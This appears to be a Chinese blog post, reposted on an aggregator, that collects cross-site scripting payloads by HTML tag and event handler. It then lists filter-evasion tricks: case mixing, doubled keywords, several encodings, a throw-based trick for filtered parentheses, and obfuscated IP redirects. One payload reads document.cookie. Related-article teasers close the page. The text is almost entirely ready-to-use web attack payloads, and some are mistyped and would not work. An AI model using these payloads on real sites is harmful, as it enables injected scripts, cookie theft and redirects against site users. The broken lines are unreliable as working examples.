代码编织梦想

无过滤情况
<sciript>

<script>alert(1);</sciript>

<img>

图片加载错误时触发
<img src="x" onerror=alert(1)>
<img src="1" onerror=eval("alert('xss')")>
鼠标指针移动到元素时触发
<img src=1 onmouseover="alert(1)">
鼠标指针移出时触发
<img src=1 onmouseout="alert(1")>

<a>

<a href="http://www.qq.com">qq</a>
<a href=javascript:alert('1')>test</a>
<a href=j"avascript:a" onmouseover="alert(/xss/)">aa</a>
<a href="" onclick=eval(alert('xss'))>aa</a>
<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

<input>

<input onfocus="alert('xss');">
竞争焦点,从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>
通过autofocus属性执行本身的focus事件,这个变量是使焦点自动跳转到输入元素上,触发焦点事件,无需用户去触发
<input onfocus="alert('xss');" autofocus>
<input value="" onclick=alert('xss') type="text">
<input name="name" value="" onmouseover=prompt('xss') bad="">
<input name="name" value=""><script>alert('xss')</script>
按下按键时触发
<input type="text" onkeydown="alert(1)">
按下按键时触发
<input type="text" onkeypress="alert(1)">
松开按键式时触发
<input type="text" onkeyup="alert(1)">

<from>

<form action=javascript:alert('xss') method="get">
<form action=javasript:laert('xss')>
<form action=1 onmouseover=alert('xss)>

iframe

<iframe onload=alert("xss");></iframe>
<iframe src=javascript:alert('xss')></iframe>
<iframe src="data:text/html,&lt;script&gt;alert('xss')&lt;/script&gt;"></iframe>
<iframe src="data:text/html;base64,<script>alert('xss')</script>">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
<iframe src="aaa" onmouseover=alert('xss') /><iframe>

<svg>

<svg onload=alert(1)>

<body>

<body onload="alert(1)">
利用换行符以及autofocus,自动去触发onscroll事件,无需用户去触发
<body onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<button>

元素上点击鼠标时触发
<button onclick="alert(1)">text</button>

<p>

元素上按下鼠标时触发
<p onmousedown="alert(1)">text</p>
元素上释放鼠标时触发
<p onmouseup="alert(1)">text</p>

<details>

<details ontoggle="alert('xss');">
使用open属性触发ontoggle事件,无需用户去触发
<details open ontoggle="alert('xss');">

<select>

<select onfocus=alert(1)></select>
通过autofocus属性执行本身的focus事件,这个向量是使焦点自动跳到输入元素上,触发焦点事件,无需用户去触发
<select onfocus=alert(1) autofocus>

<video>

<video><source onerror="alert(1)">

<audio>

<audio src=x onerror=alert("xss");>

<textarea>

<textarea onfocus=alert("xss"); autofocus>

<keygen>

<keygen autofocus onfocus=alert(1)> //仅限火狐

javascript伪协议

<a>标签
<a href="javascript:alert('xss');">xss</a>
<iframe>标签
<iframe src=javascript:alert('xss');></iframe>
<img>标签
<img src=javascript:alert('xss')>//IE7以下
<form>标签
<form action="Javascript:alert(1)"><input type=submit>

存在过滤情况
过滤空格

用 / 代替空格
<img/src="x"/onerror=alert("xss");>

过滤关键字

大小写绕过
<ImG sRc=x onerRor=alert("xss");>
双写关键字(有些waf可能会只替换一次且是替换为空,这种情况下我们可以考虑双写关键字绕过)
<imimgg srsrcc=x onerror=alert("xss");>
字符拼接(利用eval)
<img src="x" onerror="a=aler;b=t;c='(xss);';eval(a+b+c)">
字符拼接(利用top)
<script>top["al"+"ert"](``xss``);</script>(只有两个``这里是为了凸显出有`符号)

其它字符混淆

有的waf可能是用正则表达式去检测是否有xss攻击,如果我们能fuzz出正则的规则,则我们就可以使用其它字符去混淆我们注入的代码了
下面举几个简单的例子
可利用注释、标签的优先级等
<<script>alert("xss");//<</script>
<scri<!--test-->pt>alert("hello world!")</scri<!--test-->pt>
<title><img src=</title>><img src=x onerror="alert(``xss``);"> 因为title标签的优先级比img的高,所以会先闭合title,从而导致前面的img标签无效
<SCRIPT>var a="\\";alert("xss");//";</SCRIPT>

编码绕过

Unicode编码绕过
<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#120;&#115;&#115;&#34;&#41;&#59;">
<img src="x" onerror="eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')">
url编码绕过
<img src="x" onerror="eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))">
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
Ascii码绕过
<img src="x" onerror="eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))">
Hex绕过
<img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')>
八进制绕过
<img src=x onerror=alert('\170\163\163')>
base64绕过
<img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

过滤括号

当括号被过滤的时候可以使用throw来绕过
<svg/onload="window.onerror=eval;throw'=alert\x281\x29';">

过滤url地址

使用url编码
<img src="x" onerror=document.location=``http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/``>
使用IP
<img src="x" onerror=document.location=``http://2130706433/``>十进制
<img src="x" onerror=document.location=``http://0177.0.0.01/``>八进制
<img src="x" onerror=document.location=``http://0x7f.0x0.0x0.0x1/``>十六进制
<img src="x" onerror=document.location=``//www.baidu.com``>html标签中用//可以代替http://
使用\ (注意:在windows下\本身就有特殊用途,是一个path 的写法,所以\在Windows下是file协议,在linux下才会是当前域的协议)
使用中文逗号代替英文逗号
<img src="x" onerror="document.location=``http://www。baidu。com``">//会自动跳转到百度

注意如果有的src直接插入的话,可以使用<img src="x" onerror=console.log(alert(document.cookie));>来测试

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51524329/article/details/124704854

28、XSS常见payload-爱代码爱编程

环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload:,查看审查元素,payload被写在一个标签中 2、重新构造payload,先闭合标签: "

常见XSS攻击方法-爱代码爱编程

  一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 这里我们主要注意四点:1、目标网站目标用户;2、浏览器;3、不被预期;4、脚本。 二、XSS有什么危害? 当我们知道了什么是XSS后,也一定很想知道它到底有什

XSS攻击常识及常见的XSS攻击脚本汇总-爱代码爱编程

一、什么是XSS? XSS全称是Cross Site Scripting即跨站脚本,当目标网站目标用户浏览器渲染HTML文档的过程中,出现了不被预期的脚本指令并执行时,XSS就发生了。 二、XSS分类 XSS有三类:反射型XSS(非持久型)、存储型XSS(持久型)和DOM XSS 1、反射型XSS 发出请求时,XSS代码出现在URL中,作为输入提

XSS常见问题-爱代码爱编程

XSS的原理分析与解剖常见问题 xss能做什么: 盗取Cookie(用的最频繁的) 获取内网ip 获取浏览器保存的明文密码 截取网页屏幕 网页上的键盘记录 xss类型: 反射型XSS (你提交的数据成功的实现了XSS,但是仅仅是对你这次访问产生了影响,是非持久型攻击) 存储型XSS (你提交的数据成功的实现了XSS,存入了数据库,别人访问这个页面的

手把手教你XSS漏洞常见类型挖掘方法-爱代码爱编程

点击"仙网攻城狮”关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 本篇文章将讲解XSS三大类中一些细小分类漏洞挖掘方法和漏洞形成原理说明,附源码分析。 将展示以下类型挖掘方法: 反射型XSS(GET) 反射型XSS(POST) 存储型XSS DOM型XSS XSS之盲打 XSS之过滤 XSS之htmlspecl

payload的使 常用xss_小课堂 -- XSS常见payload-爱代码爱编程

环境:http://xss-quiz.int21h.jp 一、Stage #1 无过滤xss漏洞 1、随便输入字符:123 2、输入payload: 3、弹出对话框,说明存在xss漏洞 二、Stage #2 属性中的xss漏洞 1、在窗口中输入payload: ,查看审查元素,payload被写在一个标签中 2、重新构造

常见漏洞之xss-爱代码爱编程

文章目录 xss简介xss分类存储型(持续型)DOM型反射型(非持续型)xss检测xss利用xss修复 xss简介 xss(跨站脚本攻击):攻击者在网页中嵌入客户端脚本,通常是JS编写的恶意代码,当用户使用浏览器浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行 本质:找输入,找输出,构造payload 原理:xss漏洞通常是

XSS漏洞 href和js输出,以及常见防范措施-爱代码爱编程

XSS漏洞,href和js输出,以及常见防范措施(本文仅供技术学习与分享) 原则: 输入做过滤,输出做转义 过滤:根据业务需求进行过滤,比如输入点要求输入手机号,则只允许输入手机号格式的数字;所有输出到前端的数据都根据输出点进行转义,比如输出到html中进行html实体转义,输入到JS里面的进行js转义;实验准备: 皮卡丘靶场:xss只href输出皮

linux查看应用xss分配情况,XSS的常见情况总结-爱代码爱编程

2017-08-16 最近检测了几批网站,也碰到很多有关XSS的漏洞情况,个人进行一些搜集和总结,有些是网站浏览到的很棒的技术贴,有些是实际自己碰到的情况,以及自己的一些看法。 首先列举常见的XSS案例,来自于网上的技术贴,最下面给出了连接,主要是参考https://brutelogic.com.br/xss.php里的xss案例 case1:u

保存html标签并且防止xss,前端如何避免XSS攻击-爱代码爱编程

什么是 XSS Cross-Site Scripting(跨站脚本攻击)简称 XSS,是一种代码注入攻击。攻击者通过在目标网站上注入恶意脚本,使之在用户的浏览器上运行。利用这些恶意脚本,攻击者可获取用户的敏感信息如 Cookie、SessionID 等,进而危害数据安全。 XSS 分类 类型 存储区 插入点 存储型XSS 后端数据库 H

html中span xss,安全小课堂第123期【富文本存储型XSS漏洞挖掘】-爱代码爱编程

原标题:安全小课堂第123期【富文本存储型XSS漏洞挖掘】 邮件、论坛、日志发布等UGC类(用户产生内容)业务构成在线生活的重要部分。作为供用户创造内容的“生产力工具”,其背后隐藏着巨大的攻击面。其中,最易产生的问题是XSS。 XSS(Cross-site ing)是一种常见的web漏洞,借助XSS攻击者可以窃取隐私敏感数据,甚至产生蠕虫对业务带来

XSS常用标签-爱代码爱编程

目录 XSS常用标签 < script > < img > < input > < details > < svg > < select > < iframe > < video > < audio > < body &g

xss漏洞的修复建议/方法-爱代码爱编程

1. html encoding 跨站点脚本漏洞最有效的解决方案是对用户受影响输出进行 HTML encoding。 应用程序应该对:直接源自用户输入的值、可能受用户影响的值、受用户影响的数据存储库值(数据库、日志、文件等)或可能具有的任何其他信息的任何输出进行编码。 这些信息在传输中应该执行净化:替换掉非字母数字的字符,确保数据

2022第二届网刃杯网络安全大赛_网络安全大赛cs-爱代码爱编程

目录 前言      一、ICS1-ncsubj      二、ICS2-carefulguy      三、ICS3-喜欢移动的黑客      四、ICS4-easyiec      五、ICS5-xyp07      六、ICS6-LED_BOOM       七、ICS7-需要安全感 前言 前段时间在机缘巧合下参加了这